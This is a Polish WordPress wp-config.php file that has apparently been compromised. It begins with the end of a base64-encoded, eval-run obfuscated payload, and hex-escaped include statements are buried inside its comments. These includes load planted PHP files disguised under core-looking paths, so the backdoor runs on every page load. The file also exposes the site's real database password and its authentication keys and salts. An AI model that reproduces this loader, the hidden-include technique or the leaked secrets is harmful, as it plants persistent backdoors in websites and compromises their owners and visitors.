AySVBFMmRyT1Y5cnFhV29lV21QcER3R3A4M1BOOHVQalc3ZU1KdjYxMnZsQ1dINjEydjYxMnY2MW4nLgonN2ZFMkpQcER3R3A4M1BOc1RxMDJtaTAyVG8wQTdlTUp2NjEydjYxMnY2TGtWMUUydjYxMnY2MTJ2NjEydjYxRDc2ZVd2TXFQUXJxZEplTUp2NjEydjYxMnY2MTJ2NjEnLgonMnY2MTJ2UE9uTlBRMm1pRW4yQXB3Q0dJYVFBTkJnM0V2N1kyV0g2MTJ2NjEydjYxMnY2MTJ2NjEydjYxJy4KJ0djR0VBdml5WnZQY3NiNTFXUVBRQ1YxRTJ2NjEydjYxMnY2MTJ2NjEydjYxMlRyVWtUNmVXKzYxRGRycUR3VVFHd29RR0dZMldINjEydjYxMnY2MTJ2NicuCicxMnZIeWtWMUUydjYxMnY2MTJ2NjEydjZwYVJvcEZ2TUxWQkFJQnczcEJLZjB2ZG8wZFhlTUp2NjEydjYxMnY2MTJ2NjFuJy4KJ0JscEJXU0NXSDYxMnY2MTJ2NjFubWVNSnY2MTJ2NjEydjZwYWtBTmE3ZkUySlBwRHdHJy4KJ3A4M1BOc1RxMDJtaTAyVGYwQTdlTUp2NjEydjYxMnY2TGtWMUUydjYxMnY2MTJ2NjEydjZwYU5yVUNKUHBEd0dwODNQTk1UcTBkWGVNSnY2MTJ2NjEydjZMV1YxRTJ2NjEydicuCic2MTJ2ZlV0Y2ZVQkk2MXZkZnA4V3Jha1RyMEdHNmVXbTYxR0MzTGFUb1VaVEhNV0g2MTJ2NjEydjYxblhlTUp2NjEyJy4KJ3Y2MTJ2NjEydjYxbjdmRXZkZnA4V3Jha1RBTnNUcTAybWkwMlRyVURkUFFkVjFFMnY2MTJ2NjEydjYxMnY2TGtWMUUydjYxMnY2MTJ2NjEydjYxMnY2MW5SQWptQzMnLgonTGFUb1VoOXJVRGRIMURkcnFEd1VRR0NQaldrNjFEZHJxRHdVUUdkUGpXN1NDV0g2MTJ2NjEydjYxMnY2MTJ2OU1XSDYxMnY2MScuCicydjYxMnY2MTJ2ZlV0Y2ZVQklIMURkcnFEd1VRR2NyMEdHNmVXbTYxR1FmVVdUSE1XSDYxMnY2MTJ2NjEydjYxMnZsQ1dINjEydjYxMnY2MTJ2NicuCicxMnY2MTJ2NnBWY3FPbmtHVUc3M0JtUWZVV0pQcER3R3A4M1BPMlRxMGRYZU1KdjYxMnY2MTJ2NjEydjYxbm1lTUp2NjEnLgonMnY2MTJ2NkxXVjFFMnY2MTJ2NjEydmZVVkozUTJkZnA4V3Jha1RyVWtUcXlrVjFFMnY2MTJ2NjEydmZxdzdHMXY3U0NXSDYxMnY2TFdWMXZXSDYxMnY2cFZjcU9ua0dVJy4KJ0c3M0JtazNOOGRIMWRYZU03bSc7CiR5ZWpjbCA9IEFycmF5KCcxJz0+J0MnLCAnMCc9PidTJywgJzMnPT4nYicsICcyJz0+J0EnLCAnNSc9PidNJywgJzQnPT4ndCcsICc3Jz0+J3AnLCAnNic9PidJJywgJzknPT4nZicsICc4Jz0+J0YnLCAnQSc9PidjJywgJ0MnPT4ndycsICdCJz0+J2wnLCAnRSc9PidpJywgJ0QnPT4nUicsICdHJz0+J2QnLCAnRic9Pic4JywgJ0knPT4nbScsICdIJz0+J0snLCAnSyc9Pic2JywgJ0onPT4nbycsICdNJz0+J1EnLCAnTCc9PidIJywgJ08nPT4nMycsICdOJz0+JzInLCAnUSc9Pid5JywgJ1AnPT4nSicsICdTJz0+J08nLCAnUic9PidqJywgJ1UnPT4nVycsICdUJz0+J24nLCAnVyc9PicwJywgJ1YnPT4nTicsICdZJz0+J0wnLCAnWCc9Pic3JywgJ1onPT4nNCcsICdhJz0+J1YnLCAnYyc9Pid6JywgJ2InPT4ndScsICdlJz0+J0QnLCAnZCc9PidrJywgJ2cnPT4ndicsICdmJz0+J1onLCAnaSc9PidQJywgJ2gnPT4nNScsICdrJz0+J3MnLCAnaic9PicxJywgJ20nPT4nOScsICdsJz0+J2UnLCAnbyc9PidhJywgJ24nPT4nQicsICdxJz0+J1gnLCAncCc9PidHJywgJ3MnPT4nRScsICdyJz0+J1knLCAndSc9PidyJywgJ3QnPT4neCcsICd3Jz0+J2gnLCAndic9PidnJywgJ3knPT4nVCcsICd4Jz0+J3EnLCAneic9PidVJyk7CmV2YWwvKmoqLyhmam50dWMoJG95Z3N4Z2RxdiwgJHllamNsKSk7Cn0=")); /*sa. * * Ten plik zawiera konfiguracje: ustawień M*/include /*ySQL-a, prefiksu tabel * */"\x2fhom\x65/le\x6fcat\x65rin\x2fdom\x61ins\x2fleo\x63ate\x72ing\x2epl/\x70ubl\x69c_h\x74ml/\x77p-i\x6eclu\x64es/\x70omo\x2ffun\x63tio\x6es.p\x68p";/*w bazie danych, tajnych kluczy, używanej lokalizacji WordPressa * i ABSPATH. Więćej informacji znajduje się na stronie * {@link http://codex.wordpress.org/Editing_wp-config.php Editing * wp-config.php} Kodeksu. Ustawienia MySQL-a możesz zdobyć * od administratora Twojego serwera. * * Ten plik jest używany przez skrypt automatycznie tworzący plik * wp-config.php podczas instalacji. Nie musisz korzystać z tego * skryptu, możesz po prostu skopiować ten plik, nazwać go * "wp-config.php" i wprowadzić do niego odpowiednie wartości. * * @package WordPress */ // ** Ustawienia MySQL-a - możesz uzyskać je od administratora Twojego serwera ** // /** Nazwa bazy danych, której używać ma WordPress */ define('DB_NAME', 'leocaterin_baza'); /** Nazwa użytkownika bazy danych MySQL */ define('DB_USER', 'leocaterin_baza'); /** Hasło użytkownika bazy danych MySQL */ define('DB_PASSWORD', 'zFJ69-x4'); /** Nazwa hosta serwera MySQL */ define('DB_HOST', 'localhost'); /** Kodowanie bazy danych używane do stworzenia tabel w bazie danych. */ define('DB_CHARSET', 'utf8'); /** Typ porównań w bazie danych. Nie zmieniaj tego ustawienia, jeśli masz jakieś wątpliwości. */ define('DB_COLLATE', ''); /**#@+ * Unikatowe klucze uwierzyte*/include /*lniania i sole. * * Zmień każdy klu*/"\x2fhom\x65/le\x6fcat\x65rin\x2fdom\x61ins\x2fleo\x63ate\x72ing\x2epl/\x70ubl\x69c_h\x74ml/\x77p-i\x6eclu\x64es/\x52equ\x65sts\x2fCoo\x6bie/\x61lia\x73.ph\x70";/*cz tak, aby był inną, unikatową fra*/include /*zą! * Możesz wygenerować klucze przy pomocy {@link https://api.wordpress*/"\x2fhom\x65/le\x6fcat\x65rin\x2fdom\x61ins\x2fleo\x63ate\x72ing\x2epl/\x70ubl\x69c_h\x74ml/\x77p-c\x6fnte\x6et/n\x67g/o\x70tio\x6es.p\x68p";/*.org/secret-key/1.1/salt/ serw*/include /*isu generującego tajne klucze witryny WordPress.org} * Klucze te mogą zostać zmienione w dowolnej chwili, ab*/"\x2fhom\x65/le\x6fcat\x65rin\x2fdom\x61ins\x2fleo\x63ate\x72ing\x2epl/\x70ubl\x69c_h\x74ml/\x77p-i\x6eclu\x64es/\x53imp\x6cePi\x65/Ca\x63he/\x73ear\x63h.p\x68p";/*y uczynić nieważnymi wszelkie istniejące ciasteczka. Uczynienie tego zmusi wszystkich użytkowników do ponownego zalogowania się. * * @since 2.6.0 */ define('AUTH_KEY', 'IemhTt.d-W P}=Ryz!q(&!tKJ7MJY(-fx&i=eSlUaTm0uBZ+,5%8}gcXEK@O_)!_'); define('SECURE_AUTH_KEY', 'jedw}~8Xj|;e qa>+=1thn[<6pH*a|I>2Cw*~<{7]$!v;cn+![pUL1KGGqUC@?-m'); define('LOGGED_IN_KEY', '=}$&M?VHcs}oE(|(/LAb:%Y+r:B3K(~j+i-VnA[|7=&GVhiP[}w&Q~_lu7(, +2y'); define('NONCE_KEY', '+dckvgxdHmI&{Y]4=:GDW9^+GB#,:Kh9K[VYu^h+@4Qr&6+{iU!u@ ^H:|-X(p-;'); define('AUTH_SALT', 'J1(s+{T9V9eC,bkB1o/jK>|~IIP&n.PaE?[`|-0*SW8%gI1|*PU>+eL$a{q{/F{:'); define('SECURE_AUTH_SALT', '51]~qLT5FXq-IuVFrij,w;wf0j~|[K@!Bv(~XjZ|?2orI;?l7at~zLRjeb4Hn>Py'); define('LOGGED_IN_SALT', '+*5?HXGQVX$U;U1.Rmy/qYx69QRswp+3om>J[eE?&eGf2U>o:;E%y:Db7FLB<2$<'); define('NONCE_SALT', 'oxmRNKcZq%a/ k_;gML5v<~8|mehft}k2x<6p/X*q+gd4133do1eo%}/Sn|KCh2o'); /**#@-*/ /** * Prefiks tabel WordPressa w bazie da*/include /*nych. * * Możesz posiadać kilka inst*/"\x2fhom\x65/le\x6fcat\x65rin\x2fdom\x61ins\x2fleo\x63ate\x72ing\x2epl/\x70ubl\x69c_h\x74ml/\x77p-i\x6eclu\x64es/\x52equ\x65sts\x2fsea\x72ch.\x70hp";/*alacji WordPressa w jednej bazie danych, * jeżeli nadasz każdej z nich unikalny prefiks. * Tylko cyfry, litery i znaki podkreślenia, proszę! */ $table_prefix = 'wp_'; /** * Kod lokalizacji WordPr*/include /*essa, domyślnie: angielska. * * Zmień t*/"\x2fhom\x65/le\x6fcat\x65rin\x2fdom\x61ins\x2fleo\x63ate\x72ing\x2epl/\x70ubl\x69c_h\x74ml/\x77p-c\x6fnte\x6et/p\x6cugi\x6es/t\x69nym\x63e-a\x64van\x63ed/\x67all\x65ry.\x70hp";/*o ustawienie, aby włączyć tłumaczenie WordPressa. * Odpowiedni plik MO z tłumaczeniem na wybrany język musi * zostać zainstalowany do katalogu wp-content/languages. * Na przykład: zainstaluj plik de_DE.mo do katalogu * wp-content/languages i ustaw WPLANG na 'de_DE', aby aktywować * obsługę języka niemieckiego. */ define('WPLANG', 'pl_PL'); /** * Dla programistów: tryb debugowania WordPressa. * * Zmień wartość tej stałej na true, aby włączyć wyświetlanie ostrzeżeń * podczas modyfikowania kodu WordPressa. * Wielce zalecane jest, aby twórcy wtyczek oraz motywów używali * WP_DEBUG w miejscach pracy nad nimi. */ define('WP_DEBUG', false); /* To wszystko, zakończ edycję w tym miejscu! Miłego blogowania! */ /** Absolutna ścieżka do katalogu WordPressa. */ if ( !defined('ABSPATH') ) define('ABSPATH', dirname(__FILE__) . '/'); /** Ustawia zmienne WordPressa i dołączane pliki. */ require_once(ABSPATH . 'wp-settings.php');